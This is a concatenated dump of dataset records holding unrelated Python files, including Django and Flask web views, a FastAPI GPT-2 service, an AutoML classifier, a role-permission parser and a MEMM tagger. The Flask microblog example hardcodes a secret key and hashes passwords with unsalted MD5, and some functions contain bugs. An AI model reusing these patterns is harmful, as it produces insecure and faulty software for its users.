ProjectDetailView(request, pk):\n if request.user.groups.all()[0].name in ['Admin', 'Executive Director', 'Project Manager']:\n project = get_object_or_404(Project, pk=pk)\n else:\n project = get_object_or_404(Project, pk=pk, created_by=request.user.id)\n context = {\n 'title': 'Project Details',\n 'project': project\n }\n return render(request, 'dashboard/project_detail.html', context)","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"520784035","text":"\n\nclass Solution(object):\n def letterCombinations(self, digits):\n \"\"\"\n :type digits: str\n :rtype: List[str]\n \"\"\"\n res = []\n self.dfs(digits,'',0,res)\n return res\n\n def dfs(self,digit,subset, index,res):\n if index == len(digit):\n res.append(subset)\n return\n for letter in KEYBOARD[digit[index]]:\n self.dfs(digit,subset+letter, index+1,res)\n\n\n\na = Solution()\nprint(a.letterCombinations('23'))\n","sub_path":"verizon/leetcode17.py","file_name":"leetcode17.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"651232146","text":"import os\n\nfrom fastapi import FastAPI, status\nfrom fastapi.responses import PlainTextResponse\nfrom pydantic import BaseModel\nfrom transformers import GPT2Tokenizer, GPT2LMHeadModel\n\napp = FastAPI()\napp.device = os.getenv(\"TARGET_DEVICE\", \"cpu\")\napp.ready = False\n\n\n@app.on_event(\"startup\")\ndef startup():\n app.tokenizer = GPT2Tokenizer.from_pretrained(\"gpt2\")\n app.model = GPT2LMHeadModel.from_pretrained(\"gpt2\").to(app.device)\n app.ready = True\n\n\n@app.get(\"/healthz\")\ndef healthz():\n if app.ready:\n return PlainTextResponse(\"ok\")\n return PlainTextResponse(\"service unavailable\", status_code=status.HTTP_503_SERVICE_UNAVAILABLE)\n\n\nclass Body(BaseModel):\n text: str\n\n\n@app.post(\"/\")\ndef text_generator(body: Body):\n input_length = len(body.text.split())\n tokens = app.tokenizer.encode(body.text, return_tensors=\"pt\").to(app.device)\n prediction = app.model.generate(tokens, max_length=input_length + 20, do_sample=True)\n return {\"text\": app.tokenizer.decode(prediction[0])}\n","sub_path":"test/apis/async/text-generator/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"165205079","text":"import datetime\nimport peewee\n\nfrom flask import Flask, request, session, g, redirect, url_for, \\\n abort, render_template, flash\nfrom functools import wraps\nfrom hashlib import md5\n\n# config\nDATABASE = 'tweepee.db'\nDEBUG = True\nSECRET_KEY = 'hin6bab8ge25*r=x&+5$0kn=-#log$pt^#@vrqjld!^2ci@g*b'\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\ndatabase = peewee.Database(peewee.SqliteAdapter(), DATABASE)\n\n# model definitions\nclass User(peewee.Model):\n username = peewee.CharField()\n password = peewee.CharField()\n email = peewee.CharField()\n join_date = peewee.DateTimeField()\n\n class Meta:\n database = database\n\n def following(self):\n return User.select().join(\n Relationship, on='to_user_id'\n ).where(from_user=self).order_by('username')\n\n def followers(self):\n return User.select().join(\n Relationship\n ).where(to_user=self).order_by('username')\n\n def is_following(self, user):\n return Relationship.select().where(\n from_user=self,\n to_user=user\n ).count() > 0\n\n def gravatar_url(self, size=80):\n return 'http://www.gravatar.com/avatar/%s?d=identicon&s=%d' % \\\n (md5(self.email.strip().lower().encode('utf-8')).hexdigest(), size)\n\n\nclass Relationship(peewee.Model):\n from_user = peewee.ForeignKeyField(User, related_name='relationships')\n to_user = peewee.ForeignKeyField(User, related_name='related_to')\n\n class Meta:\n database = database\n\n\nclass Message(peewee.Model):\n user = peewee.ForeignKeyField(User)\n content = peewee.TextField()\n pub_date = peewee.DateTimeField()\n\n class Meta:\n database = database\n\n\n# utils\ndef create_tables():\n database.connect()\n User.create_table()\n Relationship.create_table()\n Message.create_table()\n\ndef auth_user(user):\n session['logged_in'] = True\n session['user'] = user\n session['username'] = user.username\n flash('You are logged in as %s' % (user.username))\n\ndef login_required(f):\n @wraps(f)\n def inner(*args, **kwargs):\n if not session.get('logged_in'):\n return redirect(url_for('login'))\n return f(*args, **kwargs)\n return inner\n\ndef object_list(template_name, qr, var_name='object_list', **kwargs):\n kwargs.update(\n page=int(request.args.get('page', 1)),\n pages=qr.count() / 20 + 1\n )\n kwargs[var_name] = qr.paginate(kwargs['page'])\n return render_template(template_name, **kwargs)\n\n# custom filters\n@app.template_filter('is_following')\ndef is_following(from_user, to_user):\n return from_user.is_following(to_user)\n\n# request handlers\n@app.before_request\ndef before_request():\n g.db = database\n g.db.connect()\n\n@app.after_request\ndef after_request(response):\n g.db.close()\n return response\n\n# views\n@app.route('/')\ndef homepage():\n if session.get('logged_in'):\n return private_timeline()\n else:\n return public_timeline()\n\n@app.route('/private/')\ndef private_timeline():\n user = session['user']\n messages = Message.select().where(\n user__in=user.following()\n ).order_by(('pub_date', 'desc'))\n return object_list('private_messages.html', messages, 'message_list')\n\n@app.route('/public/')\ndef public_timeline():\n messages = Message.select().order_by(('pub_date', 'desc'))\n return object_list('public_messages.html', messages, 'message_list')\n\n@app.route('/join/', methods=['GET', 'POST'])\ndef join():\n if request.method == 'POST' and request.form['username']:\n try:\n user = User.get(username=request.form['username'])\n flash('That username is already taken')\n except StopIteration:\n user = User.create(\n username=request.form['username'],\n password=md5(request.form['password']).hexdigest(),\n email=request.form['email'],\n join_date=datetime.datetime.now()\n )\n auth_user(user)\n return redirect(url_for('homepage'))\n\n return render_template('join.html')\n\n@app.route('/login/', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST' and request.form['username']:\n try:\n user = User.get(\n username=request.form['username'],\n password=md5(request.form['password']).hexdigest()\n )\n except StopIteration:\n flash('The password entered is incorrect')\n else:\n auth_user(user)\n return redirect(url_for('homepage'))\n\n return render_template('login.html')\n\n@app.route('/logout/')\ndef logout():\n session.pop('logged_in', None)\n flash('You were logged out')\n return redirect(url_for('homepage'))\n\n@app.route('/following/')\n@login_required\ndef following():\n user = session['user']\n return object_list('user_following.html', user.following(), 'user_list')\n\n@app.route('/followers/')\n@login_required\ndef followers():\n user = session['user']\n return object_list('user_followers.html', user.followers(), 'user_list')\n\n@app.route('/users/')\ndef user_list():\n users = User.select().order_by('username')\n return object_list('user_list.html', users, 'user_list')\n\n@app.route('/users//')\ndef user_detail(username):\n try:\n user = User.get(username=username)\n except StopIteration:\n abort(404)\n messages = user.message_set.order_by(('pub_date', 'desc'))\n return object_list('user_detail.html', messages, 'message_list', user=user)\n\n@app.route('/users//follow/', methods=['POST'])\n@login_required\ndef user_follow(username):\n try:\n user = User.get(username=username)\n except StopIteration:\n abort(404)\n Relationship.get_or_create(\n from_user=session['user'],\n to_user=user,\n )\n flash('You are now following %s' % user.username)\n return redirect(url_for('user_detail', username=user.username))\n\n@app.route('/users//unfollow/', methods=['POST'])\n@login_required\ndef user_unfollow(username):\n try:\n user = User.get(username=username)\n except StopIteration:\n abort(404)\n Relationship.delete().where(\n from_user=session['user'],\n to_user=user,\n ).execute()\n flash('You are no longer following %s' % user.username)\n return redirect(url_for('user_detail', username=user.username))\n\n@app.route('/create/', methods=['GET', 'POST'])\n@login_required\ndef create():\n user = session['user']\n if request.method == 'POST' and request.form['content']:\n message = Message.create(\n user=user,\n content=request.form['content'],\n pub_date=datetime.datetime.now()\n )\n flash('Your message has been created')\n return redirect(url_for('user_detail', username=user.username))\n\n return render_template('create.html')\n\n\n# allow running from the command line\nif __name__ == '__main__':\n app.run()\n","sub_path":"example/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"150720459","text":"import os\nimport pickle\n\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split, StratifiedKFold\n\nfrom autokeras import constant\nfrom autokeras.preprocessor import OneHotEncoder\nfrom autokeras.search import HillClimbingSearcher, RandomSearcher\nfrom autokeras.utils import ensure_dir, reset_weights, ModelTrainer, has_file\n\n\ndef load_from_path(path=constant.DEFAULT_SAVE_PATH):\n \"\"\"Load classifier that has been saved before.\n\n The Classifier will be saved after fitting, so you can load it later instead of training again,\n which can save time.\n\n Args:\n path: The directory in which the classifier has been saved.\n\n Returns:\n The classifier loaded from the directory.\n \"\"\"\n classifier = pickle.load(open(os.path.join(path, 'classifier'), 'rb'))\n classifier.path = path\n classifier.searcher = pickle.load(open(os.path.join(path, 'searcher'), 'rb'))\n return classifier\n\n\nclass ClassifierBase:\n \"\"\"Base class of Classifier.\n\n ClassifierBase is the base class of all classifier classes, classifier is used\n to train and predict data.\n\n Attributes:\n y_encoder: An instance of OneHotEncoder for y_train (array of categorical labels).\n verbose: A boolean value indicating the verbosity mode.\n searcher: An instance of one of the subclasses of Searcher. It search different\n neural architecture to find the best model.\n searcher_type: The type of searcher to use. It must be 'climb' or 'random'.\n path: A path to the directory to save the classifier.\n model_id: Identifier for the best model.\n \"\"\"\n def __init__(self, verbose=False, searcher_type=None, path=constant.DEFAULT_SAVE_PATH):\n \"\"\"Initialize the instance.\n\n The classifier will be loaded from file if the directory in 'path' has a saved classifier.\n Otherwise it would create a new one.\n \"\"\"\n if has_file(os.path.join(path, 'classifier')):\n classifier = pickle.load(open(os.path.join(path, 'classifier'), 'rb'))\n classifier.searcher = pickle.load(open(os.path.join(path, 'searcher'), 'rb'))\n self.__dict__ = classifier.__dict__\n else:\n self.y_encoder = None\n self.verbose = verbose\n self.searcher = None\n self.searcher_type = searcher_type\n self.path = path\n self.model_id = None\n ensure_dir(path)\n\n def _validate(self, x_train, y_train):\n \"\"\"Check x_train's type and the shape of x_train, y_train.\"\"\"\n try:\n x_train = x_train.astype('float64')\n except ValueError:\n raise ValueError('x_train should only contain numerical data.')\n\n if len(x_train.shape) < 2:\n raise ValueError('x_train should at least has 2 dimensions.')\n\n if x_train.shape[0] != y_train.shape[0]:\n raise ValueError('x_train and y_train should have the same number of instances.')\n\n def fit(self, x_train, y_train):\n \"\"\"Find the best model.\n\n Format the input, and split the dataset into training and testing set,\n save the classifier and find the best model.\n\n Args:\n x_train: An numpy.ndarray instance contains the training data.\n y_train: An numpy.ndarray instance contains the label of the training data.\n \"\"\"\n x_train = np.array(x_train)\n y_train = np.array(y_train).flatten()\n\n self._validate(x_train, y_train)\n\n # Transform y_train.\n if self.y_encoder is None:\n self.y_encoder = OneHotEncoder()\n self.y_encoder.fit(y_train)\n\n y_train = self.y_encoder.transform(y_train)\n\n if self.searcher is None:\n input_shape = x_train.shape[1:]\n n_classes = self.y_encoder.n_classes\n self.searcher = self._get_searcher_class()(n_classes, input_shape, self.path, self.verbose)\n\n # Divide training data into training and testing data.\n x_train, x_test, y_train, y_test = train_test_split(x_train, y_train, test_size=0.25, random_state=42)\n\n pickle.dump(self, open(os.path.join(self.path, 'classifier'), 'wb'))\n self.model_id = self.searcher.search(x_train, y_train, x_test, y_test)\n\n def predict(self, x_test):\n \"\"\"Return predict result for the testing data.\n\n Args:\n x_test: An instance of numpy.ndarray contains the testing data.\n \"\"\"\n model = self.searcher.load_best_model()\n return self.y_encoder.inverse_transform(model.predict(x_test, verbose=self.verbose))\n\n def summary(self):\n \"\"\"Print the summary of the best model.\"\"\"\n model = self.searcher.load_best_model()\n model.summary()\n\n def _get_searcher_class(self):\n \"\"\"Return searcher class based on the 'searcher_type'.\"\"\"\n if self.searcher_type == 'climb':\n return HillClimbingSearcher\n elif self.searcher_type == 'random':\n return RandomSearcher\n return None\n\n def evaluate(self, x_test, y_test):\n \"\"\"Return the accuracy score between predict value and test_y.\"\"\"\n y_predict = self.predict(x_test)\n return accuracy_score(y_test, y_predict)\n\n def cross_validate(self, x_all, y_all, n_splits):\n \"\"\"Do the n_splits cross-validation for the input.\"\"\"\n k_fold = StratifiedKFold(n_splits=n_splits, shuffle=False, random_state=7)\n scores = []\n y_raw_all = y_all\n y_all = self.y_encoder.transform(y_all)\n for train, test in k_fold.split(x_all, y_raw_all):\n model = self.searcher.load_best_model()\n reset_weights(model)\n ModelTrainer(model, x_all[train], y_all[train], x_all[test], y_all[test], self.verbose).train_model()\n scores = model.evaluate(x_all[test], y_all[test], verbose=self.verbose)\n scores.append(scores[1] * 100)\n return np.array(scores)\n\n\nclass ImageClassifier(ClassifierBase):\n \"\"\"Image classifier class inherited from ClassifierBase class.\n\n It is used for image classification. It searches convolutional neural network architectures\n for the best configuration for the dataset.\n \"\"\"\n def __init__(self, verbose=True, searcher_type='climb', path=constant.DEFAULT_SAVE_PATH):\n super().__init__(verbose, searcher_type, path)\n","sub_path":"autokeras/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":6380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"422489623","text":"import sys\nfrom astropy.io import ascii\nimport numpy as np\nimport matplotlib as mpl\nmpl.use('TkAgg')\nimport matplotlib.pyplot as plt\n# from astropy.convolution import convolve\nfrom astropy.stats import sigma_clip\nfrom scipy.optimize import curve_fit\nimport os\nimport astropy.io.fits as fits\nimport matplotlib.lines as lines\nimport string\n\nsigma_num=5\n\ndef fourier_sinusoidal_series_twoModes(x,a0,b0,a1,b1,a2,b2,freq,offset):\n result = a0*np.cos(2.*0*np.pi*freq*x) \\\n + b0*np.sin(2.*0*np.pi*freq*x) \\\n + a1*np.cos(2.*1*np.pi*freq*x) \\\n + b1*np.sin(2.*1*np.pi*freq*x) \\\n + a2*np.cos(2.*2*np.pi*freq*x) \\\n + b2*np.sin(2.*2*np.pi*freq*x) \\\n + offset\n return result\n\ndef clip_of_mask_flux(clip_flux):\n clip = sigma_clip( clip_flux, sigma=sigma_num, sigma_lower=None, sigma_upper=None, iters=5, cenfunc=np.ma.median, stdfunc=np.std, axis=None, copy=True)\n clipped = clip[np.logical_not(clip.mask)] - 1.\n return clipped\ndef clip_of_mask (clp_med_flux, x):\n clip = sigma_clip(clp_med_flux, sigma=sigma_num, sigma_lower=None, sigma_upper=None, iters=5, cenfunc=np.ma.median, stdfunc=np.std, axis=None, copy=True)\n clipped_x = x[np.logical_not(clip.mask)]\n return clipped_x\ndef med_flux (x):\n median = np.median(x)\n x_divide_med = x / median\n med_x = np.array(x_divide_med)\n return med_x\ndef amp_funct(x):\n min_value = min(x)\n max_value = max(x)\n med_value = np.median(x)\n ans = ((max_value - min_value) / med_value)\n return ans\n# ---------------------------------------\ndef Amp_with_Coeff(Extraction_Coeff, Delta_area, ):\n Delta_A = Delta_area\n Average_A = 0.2\n one = 1.\n Ext_coeff = Extraction_Coeff\n\n epsilon = (one / (Ext_coeff - one))\n Amplitude = (-1 * Delta_A) / (Average_A + epsilon)\n return Amplitude\n # print \"\\n -----------------------------------------------------------------\"\n # print \"\\n Amplitude with Extraction Coefficient: \\n\", Amplitude\n\n\ndef make_Amp_MiePython(Datafile):\n def Amp_x(Data_wavelength, Delta_a):\n Intensity = ascii.read(Datafile)\n wavelength = Intensity['Wavelength']\n extraction = Intensity['Transmission']\n Amp_Ext_Coeff = Amp_with_Coeff(extraction, Delta_a)\n Inter_Amp = np.interp(Data_wavelength, wavelength, Amp_Ext_Coeff)\n return Inter_Amp\n return Amp_x\n\ndef make_Amp_x(Datafile):\n def Amp_x(Data_wavelength, Delta_a):\n Intensity = ascii.read(Datafile)\n wavelength = Intensity['col1']\n extraction = Intensity['col2']\n Amp_Ext_Coeff = Amp_with_Coeff(extraction, Delta_a)\n Inter_Amp = np.interp(Data_wavelength, wavelength, Amp_Ext_Coeff)\n return Inter_Amp\n return Amp_x\n\ndef chi_squared_GOF(Mi, Yi, sigma_error_i):\n # the sum of the value minus of the expected value divided by the sigma of the expected all of it is squared\n # Chi-Squared (Goodness of Fit)\n # chi_squared = sum((Yi - Mi) ** two) / sum(sigma_error_i**two)\n two = 2\n chi_squared = sum(((Yi - Mi) ** two) / sigma_error_i ** two)\n return chi_squared\n\n\n","sub_path":"python code/def_funct.py","file_name":"def_funct.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"533138453","text":"# https://leetcode-cn.com/problems/sliding-window-median/\n\n\nclass Solution:\n def medianSlidingWindow(self, nums: List[int], k: int) -> List[float]:\n screen = sorted(nums[:k])\n res = [self.get_mudium(screen)]\n for i in range(len(nums) - k):\n screen.pop(self.binary_search(screen, nums[i]))\n insert_idx = self.binary_search(screen, nums[i+k])\n if screen and screen[insert_idx] < nums[i+k]:\n screen.insert(insert_idx+1, nums[i+k])\n else:\n screen.insert(insert_idx, nums[i+k])\n res.append(self.get_mudium(screen))\n return res\n\n\n def get_mudium(self, lst):\n length = len(lst)\n if length % 2 == 0:\n return (lst[length // 2 - 1] + lst[length // 2]) / 2\n else:\n return lst[(length - 1) // 2]\n\n def binary_search(self, lst, val):\n if len(lst) <= 1:\n return 0\n middle = len(lst) // 2\n if val == lst[middle]:\n return middle\n elif val < lst[middle]:\n return self.binary_search(lst[:middle], val)\n else:\n return middle + self.binary_search(lst[middle:], val)\n \n","sub_path":"2021-Feb/.ipynb_checkpoints/480-SlidingWindowMedian-checkpoint.py","file_name":"480-SlidingWindowMedian-checkpoint.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"248371633","text":"import os\n\nfrom cirrocumulus.envir import CIRRO_AUTH_CLIENT_ID, CIRRO_DB_URI, CIRRO_DATABASE, CIRRO_EMAIL, CIRRO_SERVE, \\\n CIRRO_FOOTER\nfrom cirrocumulus.launch import create_app\n\napp = None\n\nDEFAULT_DB_URI = 'mongodb://localhost:27017/'\nDEFAULT_DATABASE = 'cirrocumulus'\n\n\ndef cached_app():\n global app\n\n if app is None:\n app = create_app()\n\n # from flask_cors import CORS\n # CORS(app)\n configure()\n return app\n\n\ndef configure():\n from cirrocumulus.api import dataset_api\n from cirrocumulus.api import auth_api, database_api\n from cirrocumulus.no_auth import NoAuth\n auth_client_id = os.environ.get(CIRRO_AUTH_CLIENT_ID)\n db_uri = os.environ.get(CIRRO_DB_URI, DEFAULT_DB_URI)\n database = os.environ.get(CIRRO_DATABASE, DEFAULT_DATABASE)\n email = os.environ.get(CIRRO_EMAIL)\n os.environ[CIRRO_SERVE] = 'true'\n if auth_client_id is None:\n auth_api.provider = NoAuth()\n else:\n from cirrocumulus.google_auth import GoogleAuth\n auth_api.provider = GoogleAuth(auth_client_id)\n from cirrocumulus.mongo_db import MongoDb\n database_api.provider = MongoDb(db_uri, database, email)\n from cirrocumulus.parquet_dataset import ParquetDataset\n dataset_api.add(ParquetDataset())\n from cirrocumulus.anndata_dataset import AnndataDataset\n anndata_dataset = AnndataDataset('r' if False else None)\n dataset_api.add(anndata_dataset)\n\n\ndef main(argsv):\n import argparse\n import os\n parser = argparse.ArgumentParser(description='Run cirrocumulus server')\n parser.add_argument('--database', help='MongoDB database', default=DEFAULT_DATABASE)\n parser.add_argument('--db_uri', help='MongoDB database connection URI', default=DEFAULT_DB_URI)\n parser.add_argument('--email', help='Email address that server runs as')\n parser.add_argument('--auth_client_id', help='OAuth client id')\n parser.add_argument('-w', '--workers', dest='workers', help='The number of worker processes', type=int)\n parser.add_argument('-t', '--timeout', dest='timeout',\n help='Workers silent for more than this many seconds are killed and restarted', type=int, default=30)\n parser.add_argument('-b', '--bind', dest='bind',\n help='Server socket to bind. Server sockets can be any of $(HOST), $(HOST):$(PORT), fd://$(FD), or unix:$(PATH). An IP is a valid $(HOST).',\n default='127.0.0.1:5000')\n parser.add_argument('--footer', help='Markdown file to customize the application footer')\n\n args = parser.parse_args(argsv)\n\n bind = args.bind if args.bind is not None else '127.0.0.1:5000'\n if args.auth_client_id is not None:\n os.environ[CIRRO_AUTH_CLIENT_ID] = args.auth_client_id\n\n if args.footer is not None:\n os.environ[CIRRO_FOOTER] = args.footer\n\n if args.email is not None:\n os.environ[CIRRO_EMAIL] = args.email\n if args.db_uri is not None:\n os.environ[CIRRO_DB_URI] = args.db_uri\n if args.database is not None:\n os.environ[CIRRO_DATABASE] = args.database\n\n if args.workers is not None:\n workers = args.workers\n else:\n import os\n workers = 2 * os.cpu_count()\n run_args = [\n 'gunicorn',\n '-b', bind,\n '-w', str(workers),\n '-t', str(args.timeout),\n '-n', 'cirrocumulus-webserver',\n 'cirrocumulus.serve:cached_app()'\n ]\n import subprocess\n subprocess.check_call(run_args)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cirrocumulus/serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"349174949","text":"\"\"\"\nPREPARSED\n\nview_settings can be part of the body in a class or as a global setting. The\nonly difference is that in the latter, you need to specify full module paths.\n\n\nsettings style:\n{\n 'myapp.views.MyModel.myview': {\n 'admin': True,\n 'user': False,\n }\n}\n\nclass-based view_settings:\n{\n 'myview': {\n 'admin': True,\n 'user': False,\n }\n}\n\nPOSTPARSED\n\nIn all cases we get a lookup table where the permissions have been converted\nto a permission list. For this the conversion makes use of the ROLES setting.\n\nE.g.\n\n{\n 'myview': [\n (True, is_admin),\n (False, is_user),\n ]\n}\n\"\"\"\n\nimport importlib\n\nfrom django.conf import settings\nfrom django.utils.module_loading import import_string\nimport django.core.exceptions as django_exceptions\n\nfrom rest_framework_roles.exceptions import Misconfigured\nfrom rest_framework_roles import decorators\n\n\ndef validate_config(config):\n if 'roles' not in config:\n raise django_exceptions.ImproperlyConfigured(\"Missing 'roles'\")\n\n # TODO: Uncomment once we support view_permissions to be defined in settings\n # if 'view_permissions' not in config:\n # raise django_exceptions.ImproperlyConfigured(\"Missing 'view_permissions'\")\n\n\ndef load_view_permissions(config=None):\n \"\"\"\n Load view permissioins from config\n \"\"\"\n if not config:\n from django.conf import settings\n config = settings.REST_FRAMEWORK_ROLES\n validate_config(config)\n view_permissions = config['view_permissions']\n if isinstance(view_permissions, str):\n view_permissions = import_string(view_permissions)\n return view_permissions\n\n\ndef load_roles(config=None):\n \"\"\"\n Load roles from config\n \"\"\"\n if not config:\n from django.conf import settings\n config = settings.REST_FRAMEWORK_ROLES\n validate_config(config)\n roles = config['roles']\n if isinstance(roles, str):\n roles = import_string(roles)\n return roles\n\n\ndef parse_roles(roles_dict):\n \"\"\"\n Parses given roles to a common structure that can be used for building the lookup\n\n Args:\n roles_dict: A dict where key is identifier of role, and value is a role_checker\n\n Output example:\n {\n 'admin': {\n 'role_name': 'admin',\n 'role_checker': is_admin,\n 'role_checker_cost': 50,\n }\n }\n \"\"\"\n d = {}\n for role_name, role_checker in roles_dict.items():\n d[role_name] = {}\n d[role_name]['role_name'] = role_name\n d[role_name]['role_checker'] = role_checker\n try:\n cost = role_checker.cost\n except AttributeError:\n cost = decorators.DEFAULT_COST\n role_checker.cost = cost\n d[role_name]['role_checker_cost'] = cost\n return d\n\n\ndef parse_view_permissions(view_permissions, roles=None):\n \"\"\"\n Transform all configuration into a lookup table to be used for permission checking\n\n Args:\n roles(dict): Dict where key is the role name and value is a dict with\n role attributes\n view_permissions(dict): E.g. {'view': 'myview', 'permissions':[]}\n\n Output example:\n {\n 'authentication.views.UserViewSet': {\n 'create': [\n (True, is_admin),\n (False, is_anon),\n ]\n }\n }\n \"\"\"\n lookup = {}\n if not roles:\n roles = load_roles()\n roles = parse_roles(roles)\n assert type(view_permissions) is dict, f\"Expected view_permissions to be dict. Got {view_permissions}\"\n assert type(roles) is dict, f\"Expected roles to be dict. Got {roles}\"\n\n # Check roles in permissions are correct before continuing\n roles_in_view_permissions = set()\n for permissions in view_permissions.values():\n for role in permissions.keys():\n roles_in_view_permissions.add(role)\n for role in roles_in_view_permissions:\n if role not in roles:\n raise Misconfigured(f\"Role '{role}' given but such role not defined\")\n\n # Populate general and instance checkers\n for view_name, permissions in view_permissions.items():\n lookup[view_name] = []\n for role, granted in permissions.items():\n lookup[view_name].append((\n granted,\n roles[role]['role_checker'],\n ))\n\n # Sort by cost\n for view, rules in lookup.items():\n rules.sort(key=lambda item: item[1].cost)\n\n return lookup\n\n\ndef get_lookup():\n roles = load_roles()\n view_permissions = load_view_permissions()\n return create_lookup(roles, view_permissions)\n","sub_path":"rest_framework_roles/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"154040287","text":"import sys\nimport os\nsys.path.insert(0, \"..\")\nimport pickle\nimport numpy as np\nfrom utils.data_loader import DataLoader\nfrom utils.ftr_builders import TransitionFtr, EmmisionFtr, SuffixPrefix, CombinationsWordsPos, CostumeFtr\nfrom utils.viterbi import ViterbiAlg\nfrom utils.params import LEN_FTR, START\n\n\nclass MEMMTagger:\n def __init__(self, to_pred, model_file, feature_map, out_name=\"greedy_pred\"):\n self._probs = {}\n self._model = pickle.load(open(model_file, \"rb\"))\n ftr_builders = [TransitionFtr(out_dim=LEN_FTR), EmmisionFtr(out_dim=LEN_FTR), SuffixPrefix(out_dim=LEN_FTR),\n CombinationsWordsPos(out_dim=LEN_FTR), CostumeFtr()]\n self._dl = DataLoader(to_pred, feature_map, ftr_builders)\n self._label_list = self._dl.label_list + [START]\n self._label_to_idx = {label: i for i, label in enumerate(self._label_list)}\n self._tagger = ViterbiAlg(self._label_list, self._prob_func)\n self._init_probs()\n\n # --------------------- prob_func ---------------------\n # input: word_sequence, curr_word_idx, src_prob_row, prev_POS, curr_POS, log=T/F\n # output: best_score, back pointer\n\n def _prob_func(self, word_sequence, curr_word_idx, src_prob_row, prev_POS, curr_POS, log=True):\n if curr_POS == START or (curr_word_idx != 0 and prev_POS == START):\n return -2000000000000000 if log else 0, 0\n\n words = []\n words.append(word_sequence[curr_word_idx - 1] if curr_word_idx > 0 else START)\n words.append(word_sequence[curr_word_idx - 2] if curr_word_idx > 1 else START)\n words.append(word_sequence[curr_word_idx])\n words.append(word_sequence[curr_word_idx + 1] if curr_word_idx + 1 < len(word_sequence) else None)\n words.append(word_sequence[curr_word_idx + 2] if curr_word_idx + 2 < len(word_sequence) else None)\n\n if log:\n if np.std(src_prob_row) > 0:\n good_chance = np.argsort(src_prob_row)[-8:]\n else:\n good_chance = list(range(len(src_prob_row)))\n scores = {}\n for ii, prev_prev_pos in enumerate(good_chance):\n if str(([prev_prev_pos, prev_POS], words)) not in self._probs:\n sparse_vec = self._dl.to_sparse(word_sequence, [prev_prev_pos, prev_POS], curr_word_idx)\n self._probs[str(([prev_prev_pos, prev_POS], words))] = \\\n self._model.predict_proba(sparse_vec)[0]\n\n if ii < 3 or self._probs[str(([prev_prev_pos, prev_POS], words))][self._label_to_idx[curr_POS]] > 0.2:\n scores[prev_prev_pos] = \\\n self._probs[str(([prev_prev_pos, prev_POS], words))][self._label_to_idx[curr_POS]]\n\n scores = {key: src_prob_row[key] + self._my_log(val) if log else src_prob_row[key] * val for key, val\n in scores.items()}\n back_pointer, best_score = max(scores.items(), key=lambda x: x[1])\n return best_score, back_pointer\n\n def _init_probs(self):\n print(\"loadig model...\")\n for j, (all_pos, all_words) in enumerate(self._dl.data):\n\n len_data = len(self._dl)\n if (100 * j / len_data) % 10 == 0:\n print(str((100 * j / len_data)) + \"%\")\n prev_pos = [START, START]\n for i, (word, pos) in enumerate(zip(all_words, all_pos)):\n words = []\n words.append(all_words[i - 1] if i > 0 else START)\n words.append(all_words[i - 2] if i > 1 else START)\n words.append(all_words[i])\n words.append(all_words[i + 1] if i + 1 < len(all_words) else None)\n words.append(all_words[i + 2] if i + 2 < len(all_words) else None)\n\n sparse_vec = self._dl.to_sparse(all_words, [prev_pos[-2], prev_pos[-1]], i)\n self._probs[str(([prev_pos[-2], prev_pos[-1]], words))] = \\\n self._model.predict_proba(sparse_vec)[0]\n prev_pos.append(pos)\n\n @staticmethod\n def _my_log(x):\n if x == 0:\n return -100\n if x == 1:\n return -0.001\n else:\n return np.log(x)\n\n def memm_tag(self, out_name=\"res_MEMM\"):\n out_file = open(out_name, \"wt\")\n\n all_count = 0\n true_count = 0\n len_data = len(self._dl)\n for i, (all_pos, all_words) in enumerate(self._dl.data):\n if (100 * i / len_data) % 10 == 0:\n print(str((100 * i / len_data)) + \"%\")\n curr_pred = self._tagger.pred_viterbi(all_words, log=True)\n\n # print tp screen\n identical = sum([1 for p, l in zip(curr_pred, all_pos) if p == l])\n recall = str(int(identical / len(curr_pred) * 100))\n print(\"pred: \" + str(curr_pred) + \"\\nlabel: \" + str(all_pos) +\n \"\\nrecall:\\t\" + str(identical) + \"/\" + str(len(curr_pred)) + \"\\t~\" + recall + \"%\")\n\n # write to file\n for w, p in zip(all_words, curr_pred):\n out_file.write(w + \"/\" + p + \" \")\n out_file.write(\"\\n\")\n\n # calc recall\n for p, t in zip(all_pos, curr_pred):\n all_count += 1\n true_count += 1 if p == t else 0\n all_count += 1\n print(all_count, true_count, \"\\t~\" + str(int(100*true_count/all_count)) + \"%\")\n out_file.close()\n\n\nif __name__ == \"__main__\":\n args = sys.argv\n if len(args) < 5:\n print(\"input\\t\\tinput_file_name,\\t modelname,\\t feature_map_file,\\t out_file_name\\n\\n\")\n MEMMTagger(args[1], args[2], args[3]).memm_tag(out_name=args[4])\n\n","sub_path":"MEMM/MEMMTag.py","file_name":"MEMMTag.py","file_ext":"py","file_size_in_byte":5602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"519048848","text":"#!/usr/bin/env python\n\"\"\"\nmonitor.py\n2021-01-11\nPublic 